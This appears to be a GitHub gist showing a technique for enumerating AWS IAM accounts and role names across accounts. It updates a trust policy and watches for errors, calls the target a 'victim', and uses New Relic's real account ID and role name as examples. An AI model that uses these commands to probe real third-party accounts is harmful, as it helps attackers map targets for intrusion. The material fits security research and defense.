Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?

This only works when you have the victim account ID. For this example, let's say that the victim account ID is 999988887777.

Create a test role

First, create a role that we can use for this demo. This role is in your own account.

aws iam create-role --role-name test-enumeration \
    --assume-role-policy-document '{"Version": "2012-10-17","Statement": [{"Effect": "Allow","Principal": {"Service": "ec2.amazonaws.com"},"Action": "sts:AssumeRole"}]}'

Test case 1: Invalid Account ID (999988887777)

aws iam update-assume-role-policy --role-name test-enumeration \
    --policy-document '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::999988887777:user/invalid"},"Action": "sts:AssumeRole"}]}'

Test case 2: Valid Account ID (754728514883), Invalid role name (invalid)

Let's use New Relic's well-known account ID for this test.

aws iam update-assume-role-policy --role-name test-enumeration \
    --policy-document '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::754728514883:role/invalid"},"Action": "sts:AssumeRole"}]}'

Test case 3: Valid Account ID (754728514883), Valid Role name (NewRelicInfrastructure-Integrations)

Let's use New Relic's well-known account ID (754728514883) and role name (NewRelicInfrastructure-Integrations) for this test.

aws iam update-assume-role-policy --role-name test-enumeration \
    --policy-document '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::754728514883:role/NewRelicInfrastructure-Integrations"},"Action": "sts:AssumeRole"}]}'

Example

demo

References

New Relic Account ID and role name details were found here:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment